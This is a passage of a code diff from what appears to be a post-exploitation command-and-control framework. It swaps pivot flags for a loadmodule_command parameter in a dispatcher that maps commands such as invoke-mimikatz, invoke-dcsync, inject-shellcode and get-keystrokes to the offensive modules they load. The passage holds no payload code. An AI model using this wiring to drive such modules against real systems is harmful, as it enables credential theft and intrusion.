command.startswith("get-keystrokes"): - check_module_loaded("Get-Keystrokes.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-Keystrokes.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-hash"): - check_module_loaded("Get-Hash.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-Hash.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-locadm"): - check_module_loaded("Get-LocAdm.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-LocAdm.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-mshotfixes"): - check_module_loaded("Get-MSHotFixes.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-MSHotFixes.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netstat"): - check_module_loaded("Get-Netstat.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-Netstat.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-passnotexp"): - check_module_loaded("Get-PassNotExp.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-PassNotExp.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-passpol"): - check_module_loaded("Get-PassPol.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-PassPol.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-recentfiles"): - check_module_loaded("Get-RecentFiles.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-RecentFiles.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-serviceperms"): - check_module_loaded("Get-ServicePerms.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-ServicePerms.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-userinfo"): - check_module_loaded("Get-UserInfo.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-UserInfo.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wlanpass"): - check_module_loaded("Get-WLANPass.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-WLANPass.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-pbind"): - check_module_loaded("Invoke-Pbind.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Pbind.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-domaingroupmember"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-kerberoast"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("resolve-ipaddress"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-userhunter"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netlocalgroupmember"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-daisychain"): - check_module_loaded("invoke-daisychain.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("invoke-daisychain.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-hostenum"): - check_module_loaded("HostEnum.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("HostEnum.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("inject-shellcode"): - check_module_loaded("Inject-Shellcode.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inject-Shellcode.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("inveigh-relay"): - check_module_loaded("Inveigh-Relay.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inveigh-Relay.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("inveigh"): - check_module_loaded("Inveigh.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inveigh.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-inveigh"): - check_module_loaded("Inveigh.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Inveigh.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-arpscan"): - check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("arpscan"): - check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Arpscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-dcsync"): - check_module_loaded("Invoke-DCSync.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-DCSync.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-eventvwrbypass"): - check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-EventVwrBypass.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-hostscan"): - check_module_loaded("Invoke-Hostscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Hostscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-ms16-032-proxy"): - check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-MS16-032-Proxy.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-ms16-032"): - check_module_loaded("Invoke-MS16-032.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-MS16-032.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-mimikatz"): - check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psinject"): - check_module_loaded("Invoke-PSInject.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-PSInject.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-pipekat"): - check_module_loaded("Invoke-Pipekat.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Pipekat.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-portscan"): - check_module_loaded("Invoke-Portscan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Portscan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-powerdump"): - check_module_loaded("Invoke-PowerDump.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-PowerDump.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psexec"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-reflectivepeinjection"): - check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-reversednslookup"): - check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-runas"): - check_module_loaded("Invoke-RunAs.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-RunAs.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("runas-netonly"): - check_module_loaded("RunAs-NetOnly.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("RunAs-NetOnly.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-smblogin"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-smbclient"): - check_module_loaded("Invoke-SMBClient.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBClient.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-smbexec"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psexec"): - check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SMBExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-shellcode"): - check_module_loaded("Invoke-Shellcode.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Shellcode.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-sniffer"): - check_module_loaded("Invoke-Sniffer.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Sniffer.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-sqlquery"): - check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-tater"): - check_module_loaded("Invoke-Tater.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-Tater.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-thehash"): - check_module_loaded("Invoke-TheHash.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-TheHash.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-tokenmanipulation"): - check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmichecker"): - check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmicommand"): - check_module_loaded("Invoke-WMICommand.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMICommand.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wscriptbypassuac"): - check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-winrmsession"): - check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("out-minidump"): - check_module_loaded("Out-Minidump.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Out-Minidump.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("portscan"): - check_module_loaded("PortScanner.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("PortScanner.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("powercat"): - check_module_loaded("powercat.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powercat.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-allchecks"): - check_module_loaded("PowerUp.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("PowerUp.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("set-lhstokenprivilege"): - check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("sharpsocks"): - check_module_loaded("SharpSocks.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("SharpSocks.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("find-allvulns"): - check_module_loaded("Sherlock.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Sherlock.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("test-adcredential"): - check_module_loaded("Test-ADCredential.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Test-ADCredential.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("new-zipfile"): - check_module_loaded("Zippy.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Zippy.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-aclscanner"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-dfsshare"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-objectacl"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("add-objectacl"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-domainuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netcomputer"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-domaincomputer"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netuser"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netgroup"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netgroupmember"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netshare"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-sharefinder"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netdomain"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netdomaincontroller"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netforest"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("find-domainshare"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-netforestdomain"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-mapdomaintrust"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wmireglastloggedon"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wmiregcachedrdpconnection"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-wmiregmounteddrive"): - check_module_loaded("powerview.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("powerview.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmievent"): - check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("remove-wmievent"): - check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-wmi"): - check_module_loaded("Invoke-WMIExec.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-WMIExec.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-lapspasswords"): - check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("new-jscriptshell"): - check_module_loaded("New-JScriptShell.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("New-JScriptShell.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-edrchecker"): - check_module_loaded("Invoke-EDRChecker.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-EDRChecker.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-urlcheck"): - check_module_loaded("Invoke-URLCheck.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-URLCheck.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-injectedthread"): - check_module_loaded("Get-InjectedThread.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-InjectedThread.ps1", randomuri, user, loadmodule_command=loadmodule_command) -def run_autoloads_sharp(command, randomuri, user, isPBind=False, isPBindPivot=False, pbind_randomuri=None): +def run_autoloads_sharp(command, randomuri, user, loadmodule_command="loadmodule"): command = command.lower().strip() if command.startswith("run-exe seatbelt"): - check_module_loaded("Seatbelt.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Seatbelt.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe smbexec.program"): - check_module_loaded("SExec.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SExec.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpup"): - check_module_loaded("SharpUp.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpUp.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe safetydump"): - check_module_loaded("SafetyDump.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SafetyDump.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe rubeus"): - check_module_loaded("Rubeus.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Rubeus.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe standin"): - check_module_loaded("StandIn.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("StandIn.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpview"): - check_module_loaded("SharpView.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpView.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe watson"): - check_module_loaded("Watson.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Watson.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharphound"): - check_module_loaded("SharpHound.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpHound.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe internalmonologue"): - check_module_loaded("InternalMonologue.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("InternalMonologue.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpsocks"): - check_module_loaded("SharpSocks.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSocks.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpweb"): - check_module_loaded("SharpWeb.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpWeb.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpwmi"): - check_module_loaded("SharpWMI.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpWMI.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe wmiexec.program"): - check_module_loaded("WExec.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("WExec.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe smbexec.program"): - check_module_loaded("SExec.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SExec.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe invoke_dcom.program"): - check_module_loaded("DCOM.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("DCOM.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpsc.program"): - check_module_loaded("SharpSC.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSC.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-screenshotallwindows"): - check_module_loaded("Screenshot.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Screenshot.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe sharpcookiemonster.program"): - check_module_loaded("SharpCookieMonster.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpCookieMonster.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("sharpsocks"): - check_module_loaded("SharpSocks.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSocks.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("safetykatz"): - check_module_loaded("SafetyKatz.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SafetyKatz.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("sharpwmi"): - check_module_loaded("SharpWMI.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpWMI.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("sharpsc"): - check_module_loaded("SharpSC.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSC.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("sharpcookiemonster"): - check_module_loaded("SharpCookieMonster.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpCookieMonster.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe program ps"): - check_module_loaded("PS.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PS.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("pslo"): - check_module_loaded("PS.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("PS.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-dll sharpsploit"): - check_module_loaded("SharpSploit.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("SharpSploit.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe mainclass runascs"): - check_module_loaded("RunasCs.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("RunasCs.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-daisychain"): - check_module_loaded("Daisy.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("Daisy.dll", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("run-exe runas.program runas"): - check_module_loaded("RunAs.exe", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + check_module_loaded("RunAs.exe", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("portscan"): - check_module_loaded("PortScanner.dll", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot, pbind_randomuri=pbind_randomuri) + 